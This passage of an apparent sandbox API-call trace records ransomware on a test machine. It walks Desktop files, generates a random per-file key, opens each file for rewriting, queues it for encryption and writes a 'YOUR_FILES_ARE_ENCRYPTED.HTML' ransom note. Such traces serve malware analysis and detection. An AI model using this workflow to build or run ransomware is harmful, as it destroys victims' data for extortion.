wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="75") returned 2 [0166.047] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="E3") returned 2 [0166.048] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="EF") returned 2 [0166.048] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="6B") returned 2 [0166.048] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="22") returned 2 [0166.048] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="44") returned 2 [0166.048] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="73") returned 2 [0166.048] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\zn7l9.xlsx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\zn7l9.xlsx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\zn7l9.xlsx" [0166.048] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.049] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.058] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9538dd0, ftCreationTime.dwHighDateTime=0x1d7e144, ftLastAccessTime.dwLowDateTime=0x7ec02a0, ftLastAccessTime.dwHighDateTime=0x1d7e1ef, ftLastWriteTime.dwLowDateTime=0x7ec02a0, ftLastWriteTime.dwHighDateTime=0x1d7e1ef, nFileSizeHigh=0x0, nFileSizeLow=0x14cb8, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="zn7l9.xlsx", cAlternateFileName="ZN7L9~1.XLS")) returned 0 [0166.058] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0166.059] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0166.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ccay71x\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0166.060] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0166.062] CloseHandle (hObject=0x5ac) returned 1 [0166.062] GetProcessHeap () returned 0x270000 [0166.063] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0166.065] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe324670, ftCreationTime.dwHighDateTime=0x1d7e571, ftLastAccessTime.dwLowDateTime=0xfa1cbf00, ftLastAccessTime.dwHighDateTime=0x1d7e5dd, ftLastWriteTime.dwLowDateTime=0xfa1cbf00, ftLastWriteTime.dwHighDateTime=0x1d7e5dd, nFileSizeHigh=0x0, nFileSizeLow=0xd1cb, dwReserved0=0x0, dwReserved1=0x60, cFileName="CZ57sSSL.m4a", cAlternateFileName="")) returned 1 [0166.065] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\CZ57sSSL.m4a") returned 44 [0166.065] lstrcmpW (lpString1="CZ57sSSL.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.065] PathFindExtensionW (pszPath="CZ57sSSL.m4a") returned=".m4a" [0166.065] lstrlenW (lpString=".m4a") returned 4 [0166.065] PathFindExtensionW (pszPath="CZ57sSSL.m4a") returned=".m4a" [0166.065] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\CZ57sSSL.m4a" (normalized: "c:\\users\\5alr3u30d3\\desktop\\cz57sssl.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.066] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=53707) returned 1 [0166.066] GetProcessHeap () returned 0x270000 [0166.066] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.067] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="61") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="98") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="D3") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="08") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="F7") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="C3") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="83") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="76") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="15") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="D6") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="EC") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="B4") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="E8") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="33") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="7D") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="B8") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="34") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="FA") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="D0") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="C2") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="B9") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="59") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="35") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="A6") returned 2 [0166.067] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="B3") returned 2 [0166.068] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="16") returned 2 [0166.068] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="41") returned 2 [0166.068] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="66") returned 2 [0166.068] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="70") returned 2 [0166.068] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="65") returned 2 [0166.068] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="44") returned 2 [0166.068] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="7B") returned 2 [0166.068] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\CZ57sSSL.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\CZ57sSSL.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\CZ57sSSL.m4a" [0166.068] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.068] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.083] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0166.083] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\desktop.ini") returned 43 [0166.083] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.083] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0166.083] lstrlenW (lpString=".ini") returned 4 [0166.083] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0166.083] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc44768b0, ftCreationTime.dwHighDateTime=0x1d7e2d3, ftLastAccessTime.dwLowDateTime=0x1e2783f0, ftLastAccessTime.dwHighDateTime=0x1d7e64f, ftLastWriteTime.dwLowDateTime=0x1e2783f0, ftLastWriteTime.dwHighDateTime=0x1d7e64f, nFileSizeHigh=0x0, nFileSizeLow=0xdeff, dwReserved0=0x0, dwReserved1=0x60, cFileName="fW1l3mfnL9ahH.png", cAlternateFileName="FW1L3M~1.PNG")) returned 1 [0166.083] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\fW1l3mfnL9ahH.png") returned 49 [0166.083] lstrcmpW (lpString1="fW1l3mfnL9ahH.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.083] PathFindExtensionW (pszPath="fW1l3mfnL9ahH.png") returned=".png" [0166.083] lstrlenW (lpString=".png") returned 4 [0166.083] PathFindExtensionW (pszPath="fW1l3mfnL9ahH.png") returned=".png" [0166.083] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\fW1l3mfnL9ahH.png" (normalized: "c:\\users\\5alr3u30d3\\desktop\\fw1l3mfnl9ahh.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.084] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=57087) returned 1 [0166.084] GetProcessHeap () returned 0x270000 [0166.084] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.087] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="EA") returned 2 [0166.087] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="D5") returned 2 [0166.087] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="5F") returned 2 [0166.087] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="E2") returned 2 [0166.087] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="81") returned 2 [0166.087] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="68") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="EA") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="BC") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="3A") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="C9") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="68") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="F5") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="E8") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="E1") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="B1") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="55") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="51") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="00") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="B9") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="DF") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="A3") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="17") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="4A") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="18") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="FC") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="69") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="16") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="C6") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="32") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="F0") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="68") returned 2 [0166.088] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="5E") returned 2 [0166.089] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\fW1l3mfnL9ahH.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\fW1l3mfnL9ahH.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\fW1l3mfnL9ahH.png" [0166.089] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.089] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.090] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a2813f0, ftCreationTime.dwHighDateTime=0x1d7df79, ftLastAccessTime.dwLowDateTime=0x7b57f520, ftLastAccessTime.dwHighDateTime=0x1d7e026, ftLastWriteTime.dwLowDateTime=0x7b57f520, ftLastWriteTime.dwHighDateTime=0x1d7e026, nFileSizeHigh=0x0, nFileSizeLow=0x8b9e, dwReserved0=0x0, dwReserved1=0x60, cFileName="gY8jhFMOKT6jD2Iu 4M.wav", cAlternateFileName="GY8JHF~1.WAV")) returned 1 [0166.098] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\gY8jhFMOKT6jD2Iu 4M.wav") returned 55 [0166.098] lstrcmpW (lpString1="gY8jhFMOKT6jD2Iu 4M.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.098] PathFindExtensionW (pszPath="gY8jhFMOKT6jD2Iu 4M.wav") returned=".wav" [0166.098] lstrlenW (lpString=".wav") returned 4 [0166.098] PathFindExtensionW (pszPath="gY8jhFMOKT6jD2Iu 4M.wav") returned=".wav" [0166.098] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.098] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\gY8jhFMOKT6jD2Iu 4M.wav" (normalized: "c:\\users\\5alr3u30d3\\desktop\\gy8jhfmokt6jd2iu 4m.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.099] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=35742) returned 1 [0166.099] GetProcessHeap () returned 0x270000 [0166.099] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.100] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="13") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="84") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="A7") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="17") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="4E") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="85") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="3B") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="24") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="DE") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="E0") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="8F") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="89") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="D9") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="14") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="EB") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="C3") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="A2") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="2A") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="3E") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="0B") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="46") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="9C") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="BE") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="88") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="46") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="1C") returned 2 [0166.100] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="10") returned 2 [0166.101] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="BC") returned 2 [0166.101] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="E6") returned 2 [0166.101] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="FE") returned 2 [0166.101] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="58") returned 2 [0166.101] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="07") returned 2 [0166.101] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\gY8jhFMOKT6jD2Iu 4M.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\gY8jhFMOKT6jD2Iu 4M.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\gY8jhFMOKT6jD2Iu 4M.wav" [0166.101] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.101] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.109] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8def94e0, ftCreationTime.dwHighDateTime=0x1d7d987, ftLastAccessTime.dwLowDateTime=0xb8e10320, ftLastAccessTime.dwHighDateTime=0x1d7e51f, ftLastWriteTime.dwLowDateTime=0xb8e10320, ftLastWriteTime.dwHighDateTime=0x1d7e51f, nFileSizeHigh=0x0, nFileSizeLow=0x123b0, dwReserved0=0x0, dwReserved1=0x60, cFileName="HJvZ5y.bmp", cAlternateFileName="")) returned 1 [0166.109] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\HJvZ5y.bmp") returned 42 [0166.109] lstrcmpW (lpString1="HJvZ5y.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.109] PathFindExtensionW (pszPath="HJvZ5y.bmp") returned=".bmp" [0166.109] lstrlenW (lpString=".bmp") returned 4 [0166.109] PathFindExtensionW (pszPath="HJvZ5y.bmp") returned=".bmp" [0166.109] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb8e00c0, ftCreationTime.dwHighDateTime=0x1d7df37, ftLastAccessTime.dwLowDateTime=0x4af9bab0, ftLastAccessTime.dwHighDateTime=0x1d7e3f2, ftLastWriteTime.dwLowDateTime=0x4af9bab0, ftLastWriteTime.dwHighDateTime=0x1d7e3f2, nFileSizeHigh=0x0, nFileSizeLow=0x8b4b, dwReserved0=0x0, dwReserved1=0x60, cFileName="HRQrWoVqdDX0db4.csv", cAlternateFileName="HRQRWO~1.CSV")) returned 1 [0166.110] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\HRQrWoVqdDX0db4.csv") returned 51 [0166.110] lstrcmpW (lpString1="HRQrWoVqdDX0db4.csv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.110] PathFindExtensionW (pszPath="HRQrWoVqdDX0db4.csv") returned=".csv" [0166.110] lstrlenW (lpString=".csv") returned 4 [0166.110] PathFindExtensionW (pszPath="HRQrWoVqdDX0db4.csv") returned=".csv" [0166.110] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\HRQrWoVqdDX0db4.csv" (normalized: "c:\\users\\5alr3u30d3\\desktop\\hrqrwovqddx0db4.csv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.110] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=35659) returned 1 [0166.110] GetProcessHeap () returned 0x270000 [0166.111] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.111] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="59") returned 2 [0166.111] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="82") returned 2 [0166.111] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="07") returned 2 [0166.111] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="13") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="DC") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="0E") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="10") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="9A") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="A2") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="27") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="BC") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="D1") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="47") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="4F") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="73") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="A2") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="20") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="43") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="87") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="DF") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="EA") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="4B") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="54") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="FA") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="40") returned 2 [0166.112] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="B1") returned 2 [0166.113] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="09") returned 2 [0166.113] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="1D") returned 2 [0166.113] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="16") returned 2 [0166.113] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="27") returned 2 [0166.113] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="F4") returned 2 [0166.113] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="29") returned 2 [0166.113] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\HRQrWoVqdDX0db4.csv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\HRQrWoVqdDX0db4.csv") 